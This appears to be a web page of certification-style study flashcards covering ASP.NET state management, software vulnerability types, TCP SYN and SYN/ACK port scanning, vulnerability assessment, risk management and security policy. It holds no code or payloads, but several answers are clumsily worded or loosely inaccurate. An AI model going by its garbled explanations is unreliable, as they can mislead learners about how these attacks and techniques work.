Show answer and Breakdown
Answer:
the ASP.NET AJAX framework. Components: The library provides a foundation in which to produce either visual or non-visual JavaScript elements. A global JavaScript object Sys.Application handles the lifecycle management of client components.
ASP.NET Script Controls and Extenders
What are script controls and extenders?
The server portion of the ASP.NET AJAX construct introduces two categories of ASP.NET server controls for implementing…
Show answer and Breakdown
Answer:
client capabilities to server controls. An Extender is used to enhance client functionality to an existing ASP.NET control, without having to produce a new server control. A Script Control is a standalone ASP.NET control that provides both server and client functionality.
What is ASP.NET State Management
Define and describe the concept of State Management in ASP.NET.
In an ASP.NET Web application, details about the current user, his preferences, and the application’s current configuration are logged as values of global variables. This data is also…
Show answer and Breakdown
Answer:
retained as controls and properties of objects in memory to be utilized by the application until it is released or removed. This data is collectively regarded as the state of a web page. To protect the state information of a web page between round-trips or page post backs, ASP.NET offers the user several server-based as well as client-based methods. Maintaining the state for a web page across round-trips and page post backs is called state management.
Client-Based Techniques for State Management
What are the primary client-based techniques for state management and what are some of the advantages and disadvantages?
Client-based techniques maintain state of a Web page by holding information either on the page or on a client computer. If the data is stored on the client, it is submitted to a web server by the client with each web request. Here are the known advantages and disadvantages of storing data on the client computer: Advantages/Disadvantages When storing information on a client, if a large amount of data is client-side it has better scalability. Because several users send can increase bandwidth requests simultaneously, utilization and page load is improved for the client times. The disadvantage is storing data on a client side is an unauthorized user may access and compromise the data. Some client-based techniques for state management include: Click below to view
Show answer and Breakdown
Answer:
View State: View state is used to continue changes to the state of a web page across postbacks. View state data variables are stored as base 64- encoded strings in one or more embedded fields. It is retrieved by using the ViewState property of a web page. The property provides a dictionary object and maintains page or control property values between multiple user requests for the same web page. Control State: View state data of a custom control for a web page can be stored by using the ControlState property, rather than the ViewState property of the Web page. The ControlState property holds control property data during multiple round trips to the server. The control state data pertains to a custom control and is retained even if the view state is inactive at the page level. Hidden Fields: A hidden field is used to keep ViewState state information in a Web page in a HiddenField control. The control is delivered as an HTML element. A hidden field holds data that’s not visible on a web page. However, it is sent to the web server along with the page post backs. Cookies: A cookie is a client-based method and is a condensed packet of information that stores key-value pairs at the client-side. The information correlates to a specific domain and is sent along with the client request on a Web browser. Cookies hold preferences of users and offer a personalized browsing experience. Query Strings: A query string is a client-based method that keeps state information stored in a query string by affixing it to the URL of a Web page. The actual URL separates the state information with a question mark ‘?’. The state data is represented by a set of key-value pairs, each of which is separated by an ampersand character.
What are Buffer Overflow Attacks?
Describe buffer overflow.
Buffer overflow is the state of an application that has received more data than it is configured to handle. It benefits an attacker not only to deploy malicious code on…
Show answer and Breakdown
Answer:
the target system but also implement backdoors on the target system to activate further attacks. Buffer overflow attacks are a result of poor programming or faulty memory management by the application developers.
What is Stack Overflow?
Describe a stack overflow attack.
Stack overflow – in software a stack overflow is the result of an overload of memory used on the call stack. The call stack holds a limited amount of…
Show answer and Breakdown
Answer:
memory, often configured at the start of the program. The size of the call stack depends on various factors, including the programming language, machine architecture, multi-threading, and amount of available memory. When a program tries to utilize more space than is available on the call stack, the stack is said to overflow, often causing a program crash. This software glitch is usually caused by one of two types of programming errors.
What is Format String Overflow?
Describe a format string overflow attack.
String format functions in the C library take a variable number of arguments such as the format string that is always required. The format string can have…
Show answer and Breakdown
Answer:
two types of data printable characters and format-directive characters. To access the rest of the parameters that the calling function pushed on the stack, the string format function splits the format string and interprets the format directives as they are read.
What is an Integer Overflow?
Describe the scenario of an integer overflow.
In computer programming, an integer overflow happens when an arithmetic operation tries to…
Show answer and Breakdown
Answer:
create a numeric value that is too large to be accepted within the available storage space. For example, adding 1 to the largest value that can be represented constitutes an integer overflow.
What is Race Condition or Race Hazard?
Describe the race condition or race hazard vulnerability.
A race condition or race hazard is an error in an electronic system or process where the output or result of the process is unexpectedly and vitally dependent on the sequence or timing of other events. The term is derived from the idea of two signals racing each other to affect the output first. Race conditions can occur…
Show answer and Breakdown
Answer:
in electronics systems, especially logic circuits, and in system software, especially multithreaded or distributed programs. A race condition may occur in a system of logic gates, where inputs vary. If a particular output is based on the state of the inputs, it may only be defined for steady-state signals. As the inputs change state, a brief delay will occur before the output changes, based on the physical condition of the electronic system.
What is a Memory Leak Compromise?
Describe a memory leak or leakage compromise.
A memory leak or leakage is a particular type of memory consumption by a computer program where the program is incapable of releasing memory it has acquired. Memory leaks share common symptoms of other issues and can be properly identified by…
Show answer and Breakdown
Answer:
a programmer with access to the program source code; yet many people consider any unintended increase in memory usage as a memory leak, even if this technically inaccurate. Memory leaks compromise the performance of a computer by diminishing the amount of available memory. In extreme cases, an overload of available memory may become allocated and a portion or the entire system stops working properly leading to application failure or the system slows down from thrashing.
What is a Resource Exhaustion Attack?
Define a resource exhaustion attack and its most common outcome.
What is Resource Exhaustion and what typically happens from one of these attacks?
Show answer and Breakdown
Answer:
Resource exhaustion is a simple denial of service condition that happens when the resources required to execute an action are entirely expended, preventing that action from occurring. The most common outcome of resource exhaustion is denial of service. Access control: In some situations it may be possible to force a system to “fail open” when resource exhaustion occurs. Issues in system architecture and protocol design could make systems more vulnerable to resource-exhaustion attacks. A deficit of low-level consideration often plays a role in the problem. Resource exhaustion glitches are generally understood but challenging to prevent. Resources are compromised by making the target machine expend more resources to service a request rather than an attacker-initiated request.
What is Port Scanning?
What is port scanning?
Port scanning is the first task in obtaining details of open ports on the target system. Port scanning is applied to locate a hack-able server with a flaw or vulnerability. A port is a…
Show answer and Breakdown
Answer:
mode of communication between two computers. Every service on a host is labeled by a unique 16-bit number called a port. A port scanner is software designed to scan a network host for open ports. This is a tool often used by administrators to run a security check of their networks, and by hackers to pinpoint running services on a host with a perspective of where it could be compromised. Port scanning is used to locate the open ports in order to identify exploits related to that service and application.
Common Port Scanning Techniques
What are the two most common port scanning techniques?
The first: TCP SYN scanning: TCP SYN scanning is also referred to as half-open scanning because in this method a complete TCP connection is never opened. The attacker sends a SYN packet to the target port. If the port is 58 58 | P a g e open, the attacker is sent the SYN/ACK message. Here the attacker severs the connection by sending an RST packet. If the RST packet goes through, it signals that the port is closed. This type of scanning is difficult to track because, with this type of scanning, the attacker does not execute a complete 3-way handshake connection and most sites do not produce a record of incomplete TCP connections. The second is: Click to view
Show answer and Breakdown
Answer:
TCP SYN/ACK scanning: In TCP SYN/ACK scanning, an attacker sends an SYN/ACK packet to the target port. If the port is closed, the victim thinks this packet was erroneously sent by the attacker and sends the RST packet to the attacker. If the port is open, the SYN/ACK packet is disregarded, and the port drops the packet. TCP SYN/ACK scanning is a type of stealth scanning.
What is Vulnerability Assessment?
Define and describe vulnerability assessment.
A vulnerability assessment is the method of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of networks / organizations that commonly would need to perform vulnerability assessments include…
Show answer and Breakdown
Answer:
but are not limited to, nuclear power plants, information technology systems, energy supply, water supply systems, transportation systems, and communication systems. Vulnerability is the most commonplace weakness that any programming code faces. This programming code may be buffer overflow, xss, sql injection, etc. A piece of malware code that utilizes a newly discovered vulnerability in a software application, usually the operating system or a Web server, is known as an exploit.
The Five Steps of Vulnerability Assessment
What are the five steps of performing a vulnerability assessment?
Steps of Vulnerability Assessment While the precision of vulnerability assessment depends on the specific organization and its assets, the basic techniques for assessing vulnerability is outlined in these steps:
Show answer and Breakdown
Answer:
Establish a baseline: Baseline-reporting step sets up the starting point for basic system settings, including the base operating system and any installed applications. Review the code: In this step, a security administrator examines the code in the applications deployed to ascertain if they’re at optimal functioning based on available technology. Simply assuming that the code is acceptable is not enough; administrators must examine it to determine its technological soundness based on current standards. Determine the attack surface: The attack surface is the code and services available in each application to all users, including unauthorized users. The more services and ports available to unauthorized users, the greater the attack surface. The larger the attack surface, the higher degree of system vulnerability. Review the architecture: This task requires administrators to examine the system components and their interactions with the operating system and applications. Examining architecture can assist in identifying vulnerabilities in the way applications address the system components, such as memory, which can be exploited in an attack. Review the design: After collecting all of the information, administrators must look at the design of these systems, from operating system to applications, to assess the vulnerabilities they can eliminate through stricter security settings or the removal of unnecessary code.
Risk Management – The Security Risk Implications of Business Decisions
We will take a deep look at the security risk implications of some of the more commonly made business decisions that organizations face. It is important to be able to analyze the scenarios to determine all possible risk possibilities and plan to mitigate them.
Every organization has confidential information and resources to accomplish their business activities. Sensitive information and resources are hot targets and vulnerable to both internal and external threats. Every organization makes critical business decisions that have an integral role in the viability and growth of the organization. It is crucial to determine and understand present risks associated with those decisions in order to preserve sustainability. Risk management of new products, new technologies, and user behaviors The hazards of implementing new products, technologies and user behaviors, if poorly managed can exceed the business benefits. New technology and products commercialization methods hold vital significance in the present competitive corporate world. They open up new opportunities, produce market leaders, and foster growth and fortitude to face the onslaught of competition. New or changing business models/strategies A business model exhibits the rationale of how an organization creates, delivers, and captures value (economic, social, or other forms of value). Business model development is inherent to business strategy. In theory and as demonstrated in employment, the term business model is used for a wide range of informal and formal descriptions to reflect core elements of a business, including purpose, offerings, strategies, infrastructure, organizational structures, trading practices, and operational processes and policies. Thus it offers a comprehensive picture of an organization from a high-level perspective. Once a business is formed, it either explicitly or implicitly applies… click below for more
Show answer and Breakdown
Answer:
a specific business model that outlines the architecture of the value creation, delivery, and active mechanisms employed by the business enterprise. The fundamental purpose of a business model is that it specifies the manner and method by which the business enterprise delivers value to customers, attracts customers to pay for value, and turns those payments into profit. The business model also represents management’s idea about what the customer wants, how they want it, and how that business can best perform to meet those needs, get paid for doing so, and turn a profit. The business models and strategies follow the various business requirements. These requirements can be partnership, outsourcing, or merging. Partnerships A partnership is a for-profit business association of two or more members. Because the business aspect is broadly defined by state laws, and because “members” or persons can include individuals, groups of individuals, companies, and corporations, partnerships are very fluid in form and vary in complexity. Each partner shares in the organization’s profits and shares control of the business operation. The terms of this profit sharing is that partners are jointly and independently liable for the partnership’s debts. Internal and external influences Various internal factors impact business decisions such as, demographics, lifestyle, personality, motivation, knowledge, attitudes, beliefs, and feelings. Business and consumer habits are also affected by culture, subculture, locality, royalty, ethnicity, family, social class, past experience reference groups, lifestyle, market mix factors. Psychological factors include an individual’s attitudes, preferences and beliefs, while personal factors include economic status, personality, age, profession and lifestyle. Audit findings Audit findings are a useful tool with implementing improvements within a quality management system. Findings and nonconformity statements aren’t always clearly communicated or provide enhancements to an organization. The Effective Audit Findings is specialized to mitigate incomplete findings, as well as those that fail to support the intent of the process. An effective audit assists the organization with how it obtains and analyzes findings from second- and third party auditors with the long-term goal of quality management system improvement. Compliance Compliance is defined as dutifulness, obligingness, pliability, tolerance, and tractability. Compliance requires an organization to manage internal regulations, as well as comply with the laws of the country and requirements of laws at the local level. This may result in conflicts. Client requirements Requirements analysis for the ongoing business viability entails tasks that evaluate the needs or conditions to meet for a new or modified product, finding any conflicting requirements of the various stakeholders, such as beneficiaries or users. This is an early phase of what’s known as requirements engineering which include all functions concerned with eliciting, analyzing, documenting, validating, and managing software or system requirements. Business analysts may attempt to make requirements fit within an existing system or model, rather than starting from scratch and develop a system that reflects the needs of the client. Analysis may be performed by engineers or programmers rather than personnel who have interpersonal knowledge of a client’s needs.
The Impact of De-Perimiterization
What is the risk impact of de-perimiterization (constantly changing network boundary) on an organization?
Security boundaries are usually established by a set of systems under a single administrative control. These boundaries are found at different levels, and vulnerabilities can become exposed as data crosses each one. Considerations of enterprise standard operating environment (SOE) vs. allowing individually managed devices on corporate networks. A Standard Operating Environment (SOE) is an industry term that…
Show answer and Breakdown
Answer:
explains a standard implementation of an operating system and its respective software. It is typically installed as a standard Disk Image that can be widely deployed to more than one computer in an organization. It can include the base operating system, a custom configuration, standard applications used within an organization, software updates, and service packs. An SOE can involve servers, desktops, laptops, thin clients, and mobile devices. The main benefit of having an SOE in a business environment is reduced cost and minimized time to deploy, program, manage, and support computers. By standardizing the hardware and software platforms utilized by an organization, the IT department or service provider can activate new computers and resolve problems with existing computers quickly. A standardized, reusable and automatic solution creates a known, anticipated and supportable environment. A standardized solution makes certain that known outcomes are maintained, with automatic functioning to sustain speed, repeatability, and standardization.
Implementing a Risk Mitigation Strategy
Things to consider when implementing a risk mitigation strategy.
When risks and their associated priorities are known, the first step is establishing a formulated strategy for mitigating the risks in a cost effective manner. Mitigation methods should give…
Show answer and Breakdown
Answer:
consideration to account cost, time to implement, success rate, completeness, and impact on the complete accounting of known risks. A risk mitigation strategy should always conform to the business context and should evaluate what the organization can afford, implement, and understand. It should also clearly define validation techniques that can be proposed to show risks are being properly mitigated. Factors to be aware of are based on financial investment including estimated cost takeout, ROI (return on investment), effectiveness in terms of dollar impact, and percentage of risk coverage.
Classify information types into levels of CIA based on organization / industry
Common information classifications based on CIA.
Information Security Attributes: Confidentiality, Integrity, and Availability (CIA). Information Systems consist of three main portions: hardware, software, and communications with the purpose to locate and apply…
Show answer and Breakdown
Answer:
information security industry standards, as methods of protection and prevention, at three levels: Physical, personal, and organizational. Processes and policies are implemented to inform people (administrators, users, and operators) how to properly apply products to preserve information security within the organizations. The type of information security classification labels chosen and applied is based on the organization’s environment, such as: In the business sector, labels such as: Public, Sensitive, Private, and Confidential. In the government sector, labels such as: Unclassified, Sensitive But Unclassified, Restricted, Confidential, Secret, and Top Secret and their non-English equivalents. In cross-sectoral formations, the Traffic Light Protocol, which consists of: White, Green, Amber, and Red.
Aggregate CIA Scores and Security Controls
Determine the aggregate score of CIA and the security controls required based on the score.
Determine aggregate score of CIA The aggregate CIA score assesses the effects on Confidentiality, Integrity, and Availability. The aggregate score will be listed as low, moderate, or high. Determine minimum required security controls based on aggregate score Security controls are…
Show answer and Breakdown
Answer:
tactics or counteragents to avoid, counteract, or diminish security risks. To help measure or develop security controls, they can be qualified by several criteria, such as the duration of time that they respond, relative to a security incident. Information security controls safeguard the confidentiality, integrity and/or availability of information (the so-called CIA Triad). In many cases added categories such as non-repudiation and accountability are included depending on how narrowly or broadly the CIA Triad is defined.
Conducting System Specific Risk Analysis and Steps Required
Overview and the steps taken in conducting system specific risk analysis.
Conduct system specific risk analysis Risk analysis gives higher management the specifics required to ascertain and understand the risks that…
Show answer and Breakdown
Answer:
should be mitigated, transferred, and accepted. It identifies risks, quantifies the aftereffects of threats, and supports budgeting for security. It adapts the requirements and objectives of the security policy to the business objectives and motives. The stages of Risk Analysis: Inventory Threat assessment Evaluation of control Management Monitoring
What is Risk Determination?
How to define risk determination.
Risk determination is the process of perception and identification of new risk parameters or…
Show answer and Breakdown
Answer:
new relationships among existing risk parameters, or observation of a shift in magnitudes of existing risk parameters. It also includes related methods of risk identification and risk evaluation. Risk determination is mandatory for every Project Manager worldwide, but these techniques have their advantages and disadvantages.
Magnitude of Impact Model for Risk Analysis
Know the Magnitude of Impact Model for risk assessment.
Magnitude of Impact High: Exercise of the vulnerability – May result in significant loss of major tangible assets or resources. – May extensively violate, damage, or disrupt an organization’s mission, reputation, or interest/investments. – May result in human death or critical injury. click for more…
Show answer and Breakdown
Answer:
Medium: Exercise of the vulnerability: – May result in the significant loss of tangible assets or resources. – May violate, harm, or disrupt an organization’s mission, reputation, or interest/investments. – May result in human injury. Low: Exercise of the vulnerability: – May result in the loss of some tangible assets or resources. – May noticeably affect an organization’s mission, reputation, or interest. – Likelihood of threat.
Vulnerability Plausibility Rating, Factors and Levels
What are the factors of a plausibility rating, and what are the three levels of a rating?
To conclude overall plausibility rating that is used to identify the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, these principle factors should be considered: Threat-source motivation and capability Nature of the vulnerability Existence and effectiveness of current controls click below to view the three levels (likelihood) of plausibility…
Show answer and Breakdown
Answer:
The three levels of plausibility (or likelihood): High: In this level, the threat-source is highly motivated and sufficiently capable, and controls to prevent the vulnerability from being exercised are ineffective. Medium: In this level, the threat-source is motivated and capable, but controls are in place that may impede successful exercise of the vulnerability. Low: In this level, the threat-source lacks motivation or capability, or controls are in place to prevent, or at least significantly impede, the vulnerability from being exercised.
Decision Process for Security Control Application
How to decide which security controls you should apply.
Risks fall into three main categories: controllable known, uncontrollable known, and unknown. For the first two, one must have…
Show answer and Breakdown
Answer:
knowledge of the risks before they can ascertain how to manage them. This is done using root cause analysis. The objective is to identify the root cause of the problem and solve it as quickly as possible. Kendrick briefly discusses the use of fishbone diagrams as a technique to facilitate this process. Unknown elements should also be handled this way but obviously as they occur.
The Four Methods of Handling Risk
What are the four ways risk may be handled?
Avoid: Take action to avoid the risk.
Transfer: Have someone else handle the risk i.e. insurance. click below…
Show answer and Breakdown
Answer:
Mitigate: Define actions to take when the risk occurs. Accept: Identify the risk as acceptable and let it happen.
How to Effectively Implement Security / Risk Controls
What are the steps involved in properly implementing security / risk controls?
Once the proper control measures available to manage the hazards and minimize risks in the workplace have been identified, the next task is putting these controls in place. This involves engaging in activities necessary that allow identified measures to operate effectively. Effective implementation typically includes the development of an implementation plan. Items that should be included:
Show answer and Breakdown
Answer:
Specify the preferred control options Set out the steps that need to be taken to implement the control measures Identify and allocate the resources necessary to implement the control measures (time and expenses) Allocate responsibilities and accountabilities (who does what and when) Set the timeframe for implementation (expected time for completion) Set a date for reviewing the control measures.
What is Enterprise Security Architecture (ESA) Framework?
Briefly define and describe the important points of an Enterprise Security Architecture (ESA) Framework for security governance.
ESA Framework A Framework for architecture-modeling of KPI driven enterprise business applications. Characteristics include:
Show answer and Breakdown
Answer:
Organizations use KPIs to measure effectiveness and efficiency of business processes Some KPI measurement happens after the fact while others during the execution of business process (to raise alarm/automatic escalations) Organizations want to continuously fine-tune and improve the business process in response to KPI measurements Organizations are interested in KPIs that span multiple business processes
Continuous Monitoring and Why it is Important
What is continuous monitoring and why is it important?
Continuous monitoring in any system begins after initial system security authorization. It entails monitoring any…
Show answer and Breakdown
Answer:
changes to the information system that occur over time and measures the cumulative impact of those changes on the system security. Because of the needed changes in hardware, software, and firmware during the lifetime of an information system, an examination of the effects of these changes must be performed to evaluate if corresponding changes necessarily have to be made to security controls, to sustain the system at a desired security state.
The Importance of Preparing for and Supporting Incident Response
Explain the importance of preparing for and supporting the incident response and recovery process.
Organizations are reliant on IT systems to manage their enterprise. Availability of these systems has become vital for the smooth operation of a company and in some cases the economy as a whole, making the importance of…
Show answer and Breakdown
Answer:
continued operations of the business are a very critical issue. Any disruption of service or compromised data can have significant impact, particularly financially, on an organization if there is loss of customer confidence. Incident response is a systematic approach to handling the aftermath of a security breach or attack (also known as an incident). The main objective is to manage the situation as efficiently as possible to reduce damage or disruption of business processes, minimize recovery time as well as cost. An incident response plan includes a policy that outlines, in specific terms, what constitutes an incident and details the protocol that should be followed when an incident occurs.
What is E-Discovery?
Explain the concept of e-Discovery or electronic discovery.
Electronic Discovery or E-Discovery is the discovery process in civil litigation concerned with the exchange of information electronically. Usually a digital forensics analysis is done for…
Show answer and Breakdown
Answer:
recovering evidence. A variety of experts are involved in Electronic Discovery leading to problems with confusing terminology. Data is qualified as relevant by legal representatives and placed on legal hold. Evidence is then obtained and examined using digital forensic methods, and are usually converted into PDF or TIFF format for use in court.
What is Electronic Inventory and Asset Control
Explain the concept of electronic inventory and asset control.
Electronic inventory is a critical aspect of business operation. Keeping and storing inventory can be costly and companies figured out a way to efficiently manage their…
Show answer and Breakdown
Answer:
inventory has an advantage over competitors. Asset control is the set of business practices that connect financial, contractual, and inventory functions to sustain life cycle management and strategic decision making for the IT environment. Assets include all components of software and hardware found in the business environment.
Data Retention Policies
Describe the use of data retention policies.
The creation of data retention policies is used to outline the procedures of persistent data and records management for satisfying legal and business data archival requirements. A data retention policy is applied to measure…
Show answer and Breakdown
Answer:
legal and privacy issues against economics and need to know concerns to quantify the retention time, archival rules, data formats, and the permissible means of storage, access, and encryption.
What is Data Recovery?
Describe the principles of data recovery.
Data recovery is the process of recovering data from damaged, failed, corrupted, or inaccessible secondary storage media when it cannot be retrieved normally. Often data is being recovered from…
Show answer and Breakdown
Answer:
storage media such as internal or external hard disk drives, solid-state drives (SSD), USB flash drive, storage tapes, CDs, DVDs, RAID, and other devices. Data salvage may be required due to physical damage to the storage device or logical damage to the file system that impedes it from being mounted by the host operating system.
Mitigation of Vulnerability or Breach Risk
What three steps are involved in mitigating vulnerability or data breach risk?
The following three steps should be taken to mitigate the risk of vulnerability or data breach:
Show answer and Breakdown
Answer:
Take an inventory of PHI/PII: An inventory gives a complete accounting of every aspect of personally identifiable information (PII) and PHI that an organization holds, in either paper or electronic format. Develop an Incident Response Plan (IRP): An IRP is an effective, cost efficient means for helping organizations meet HIPAA and HITECH requirements and develop guidelines related to data breach incidents. Review contracts and agreements with business associates: Business associates are an increasing factor of data breaches. These contracts between organizations and business associates need to be updated. Furthermore, the following precautions should be added to your organization’s security program: Utilize an encryption system Place controls on data storage and access Regulate use of portable devices and storage media Carefully dispose of outdated equipment and records Keep a backup set of records off-site
What is a Data Breach?
Define a data breach.
A data breach is the intended or unintended release of secure information into an untrusted environment. Incidents vary from a concentrated attack by black hats with the assistance of organized crime or national governments to…
Show answer and Breakdown
Answer:
sloppy disposal of computer equipment or data storage media. A data breach is a security incident where highly sensitive or confidential data is copied, transmitted, viewed, or stolen by an unauthorized agent. Financial information like credit card or bank details, personal health information (PHI), personally identifiable information (PII), and trade secrets of corporations or intellectual property are other examples of a data breach.
The Role of Incident Response and its Relation to Incident Handling and Management
What is incident response, how does it relate to incident handling and incident management.
Incident response is a process that discovers a problem, finds its cause, minimizes the damages, corrects the problem, and documents each step of response for future reference. One of the main objectives of incident response is to “freeze the scene”. There’s an interconnection between incident response, incident handling, and incident management. The key goal of incident handling is to…
Show answer and Breakdown
Answer:
contain and fix any damage caused by an event and to suspend any further damage. Incident management administers the overall process of an incident by officially declaring the incident and preparing documentation and post-mortem assessments after the incident has occurred.
The Importance of a Privacy Policy in Data Protection
What is a privacy policy and how does using one help to mitigate data breach risk within an organization?
Privacy policy is an aspect of security policy. It deals with privacy and protection of customer and supplier information. This policy supports and strengthens trust between…
Show answer and Breakdown
Answer:
the organization and external entities. Because the external entities’ information could be highly confidential, it is critical that the organization show its respect for this information. It might include contracts, sales documents, financial data, or personally identifiable information. If the information is corrupted, stolen, or exposed by an unauthorized party, the organization can respond with legal action against the violator for infringing on their privacy policy.
The Difference Between Security Policy and Privacy Policy
How does a security policy differ from a privacy policy?
Security policy is a detailed description of what it means to be secure for a system, organization or other entity. For an organization, it deals with the parameters of behavior of its members as well as restrictions imposed on adversaries or unauthorized persons by mechanisms such as doors, locks, keys, and walls. For systems, the security policy specifically deals with…
Show answer and Breakdown
Answer:
restrictions on functions and flow among them, restrictions on access by external systems and persons including programs and access to data by people. Privacy policy is an official statement or legal document (privacy law) that conveys some or all methods a party gathers, uses, discloses, and manages a customer or client’s data. Personal information is anything that can be used to identify an individual, including: name, address, date of birth, marital status, contact information, ID issue and expiry date, financial records, credit information, medical history.
Factors that Determine the Need for Policy Development
Factors that define the need for policy development.
A policy is typically described as a principle or rule to guide and clarify decisions and find rational outcome(s). The term is not normally something that conveys specific tactics; this is normally referred to as either procedure or protocol. Policies are recognized by the senior governance body within an organization; and procedures are developed and recognized by senior executive officers. Policies can aid with subjective and objective decision making. Policies that aid in subjective decision-making would…
Show answer and Breakdown
Answer:
usually guide senior management with decisions that must take into account the relative benefits of a number of factors before making official decisions. These are often difficult to objectively measure. For instance, establishing a work-life balance policy. Policies to aid in objective decision-making are usually operational in nature and can be objectively tested such as password policy. The process of policy development starts with acknowledging the need for written policy. Often a board or superintendent must address a decision that would be easier to make if a policy existed. The board is not alone in determining policy needs. Parents, students, teachers, local taxpayers, the superintendent, the state or federal government, and pressure groups are all factors involved with policy issues and problems.
Process Simulation
What is process simulation and what is it generally intended for?
Process simulation is implemented in the design, development, analysis, and optimization of technical processes and is generally applied to…
Show answer and Breakdown
Answer:
chemical plants and chemical processes, but also to power stations, and similar technical facilities. Process development consists of process research and innovation; scale-up; design, construction and operation of pilot plant or laboratory units; technology transfer; and optimization of manufacturing processes.
Legal Compliance Solution
What is a Legal Compliance Solution?
Legal Compliance Solution is a collection of specialized courseware that is purposed to address an organization’s compliance training needs. Legal Governance, Risk Management, and Compliance or “LGRC”, entails the…
Show answer and Breakdown
Answer:
complex set of procedures, rules, mechanisms and systems used by corporate legal departments to develop, implement and monitor using a blended approach to business problems. While Governance, Risk Management, and Compliance pertains to a generalized set of tools for maintaining a corporation or company, Legal GRC, or LGRC, refers to a specialized – but similar – set of tools utilized by attorneys, corporate legal departments, general counsel and law firms to monitor themselves and their corporations, especially in law-related matters.
Business Documents to Support Security, ISA and MOU
Certain business documents help mitigate risk within an organization. Examples include Interconnection Security Agreement (ISA) and a Memorandum of Understanding (MOU). How do these contribute to security?
Interconnection Security Agreement (ISA) An Interconnection Security Agreement (ISA) is a contractual agreement between the organizations that own and run linked IT systems to keep record of the technical requirements of the interconnection. The ISA keeps both partnering organizations in sync with one another’s technical requirements and helps to define liability in negligence. The ISA also supports a Memorandum of Understanding or Agreement (MOU/A) between the organizations. click for more…
Show answer and Breakdown
Answer:
Memorandum of Understanding (MOU) A memorandum of understanding (MOU) is a form that outlines a bilateral or multilateral understanding between two parties. This document defines a partnership of will between the parties, stating a proposed common line of action.
What is Personally Identifiable Information (PII)?
It is important to understand what exactly constitutes Personally Identifiable Information (PII) and what technically does not qualify as PII.
Personally Identifiable Information (PII), as used in information security, applies to information that can be used to uniquely identify, contact, or locate an individual or can be integrated with other sources to uniquely identify a single individual. The abbreviation PII is widely understood, but the phrase it abbreviates has…
Show answer and Breakdown
Answer:
four common variants based on personal, personally, identifiable, and identifying. Not all have equivocal interpretation. The definitions vary based on the jurisdiction and objectives for which the term is being applied. The US government used personally identifiable information in 2007 in a memorandum from the Executive Office of the President, Office of Management and Budget (OMB), and that terminology now appears in US standards such as the NIST Guide to Protecting the Confidentiality of Personally Identifiable Information. The OMB memorandum defines PII as follows: Information which can be used to analyze or trace an individual’s identity, such as their name, social security number, birth certificate, on their own or when combined with other personal or identifying information which is connected or can be connected to a specific individual, such as date and place of birth, mother’s maiden name, etc.
What is Separation of Duties (SoD)?
What is the concept of Separation of Duties (SoD) and how does it play a role in security as a policy that contains?
Separation of duties (SoD) is the concept of having more than one individual charged to complete a task. It is also referred to as segregation of duties or, in the political realm, separation of powers. It is a “policy that contains”. Segregation of duties assists in…
Show answer and Breakdown
Answer:
minimizing the potential damage from the actions of one person. The IS or end-user department should be coordinated in a way that supports adequate separation of duties. According to ISACA’s Segregation of Duties Control matrix, certain duties should not be incorporated into one position. This matrix is not an industry policy, but more of a suggestion about which positions should be separated and which require sharing of controls when combined.
Job Rotation
What is job rotation and why is it helpful to organizations?
Job rotation is an approach to management development where an individual is taken through a schedule of…
Show answer and Breakdown
Answer:
assignments designed to give him or her broad exposure to the entire operation. Job rotation is performed in order to give qualified employees the opportunity to gain more insights into the processes of a company, and to increase job satisfaction through job variation
Mandatory Vacation
Explain the policy of mandatory vacation and why it may benefit an organization.
Mandatory vacations are required vacations imposed on employees for their professional benefit. These vacations ensure…
Show answer and Breakdown
Answer:
personal time employees should have within the working cycle. Preventing burnout is important to sustain the expected level of productivity that would otherwise be impacted by an overworked employee. Mandatory vacations ensure that employees are effective when on duty.
Least Privilege / Minimal Privilege
What is least privilege / minimal privilege?
The principle of least privilege, also referred to as the principle of minimal privilege or just least privilege, necessitates that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program based on the layer and given functions) must have…
Show answer and Breakdown
Answer:
access to only the information and resources necessary to its authorized purpose. When applied to the users, the terms “least user access” and “least privileged user account” (LUA) are also applied, conveying the concept that all users at all times should run with as minimal privileges as possible, and also launch applications with minimized privileges.
How to Use Trend Analysis to Mitigate Risk and Improve Security
How can trend analysis help mitigate risk and improve operational, ongoing security for an organization?
Trend Analysis is the practice of gathering information and attempting to identify a pattern, or trend, in the information. In some fields of study, the term “trend analysis” is more formal in application and meaning. Although trend analysis is often used to anticipate future events, it can also be used to measure uncertain events of the past such as “how many ancient kings probably ruled between two dates, based on data such as the average years which other known kings reigned.” Here is how to Enact / Use Trend Analysis:
Show answer and Breakdown
Answer:
Perform On-Going Research On-going research can help to examine and measure industry trends as well as determine potential impact to the enterprise. Best practices of on-going research helps to transition from complexity to simplicity and also serves as a guide to find best practices for doing new things. New Technology Identification On-going research is a very important element for successfully managing and taking a project in a progressive direction most efficiently. It is also helpful in identifying new technologies, which may improve security continually.
Technology Evolution, Internet Standards, ISO and RFC’s
How is technology evolution standardized? What roles are played by the International Organization of Standards (ISO) and Request for Comments (RFC’s)?
Request for Comment (RFC) is information proposed by an autonomous body, to outline the Internet suite of protocols and related experiments. All Internet standards are written as RFCs and are unique as these documents are not formally reviewed, established and advocated by organizations like American National Standards Institute (ANSI). Here are some categorical descriptions of RFC’s that indicate its status within the Internet standardization process:
- Informational: An informational RFC can be nearly anything from April 1 jokes over proprietary protocols up to widely recognized essential RFCs like RFC 1591. Some informational RFCs form the subseries for your information (FYI).
- Experimental: An experimental RFC can be an IETF document or an individual submission to the ‘RFC Editor’. In theory it’s considered experimental; in practice some documents are not applied on standards track because there are no volunteers for the methodology.
- Best current practice: The best current practice (BCP) subseries gathers administrative documents and other texts, which are regarded as official rules and not only informational, but do not have effect over the wire data. The border between standards track and BCP is often ambiguous. If a document only affects the Internet Standards Process, like BCP 9, or IETF administration, it is clearly a BCP. If it only defines rules and regulations for Internet Assigned Numbers Authority (IANA) registries, it is imprecise. Most of these documents are BCPs but some are on the standards track. click to continue…
Show answer and Breakdown
Answer:
